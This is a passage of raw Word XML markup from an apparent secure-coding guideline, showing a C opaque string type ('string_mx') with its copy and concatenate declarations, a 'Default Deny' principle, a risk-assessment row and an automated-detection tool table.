              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7F088DD8" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06368432" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* Function declarations */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747A14DA" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>extern</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>errno_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strcpy_m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s1, const</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0A7EF339" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>extern</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>errno_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>strcat_m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s1, const</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2DC0EC09" w14:textId="77777777" w:rsidR="00F72634" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>/* ... */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76369CBC" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="669C87DB" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Internal-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BEBB4C1" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">struct </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C81F640" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="50D0E08C" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>maxsize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="784338E4" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  unsigned char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>strtype</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="45EA8175" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  char *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="783CC6FF" w14:textId="50753E71" w:rsidR="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:r w:rsidRPr="0019484D">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4B22321F" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008C066B" w:rsidRPr="008F02CA">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Default Deny</w:t>
            </w:r>
            <w:r w:rsidR="008C066B">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> – We deny access to these abstract types by keeping them private.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12B0906" w:rsidR="00B475A1" w:rsidRDefault="008C066B" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EE4DA51" w14:textId="51A557F2" w:rsidR="00B475A1" w:rsidRDefault="008C066B" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9846CA" w14:textId="0D0196EB" w:rsidR="00B475A1" w:rsidRDefault="008C066B" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E0ACD7" w14:textId="472A0642" w:rsidR="00B475A1" w:rsidRDefault="008C066B" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E539ECE" w14:textId="21D6D5ED" w:rsidR="00B475A1" w:rsidRDefault="008C066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8C066B" w14:paraId="34797317" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F729ADB" w14:textId="2C16ED91" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="008C066B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AAB69D9" w14:textId="772E4C49" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C066B">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D087CB4" w14:textId="745B1943" w:rsidR="008C066B" w:rsidRPr="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
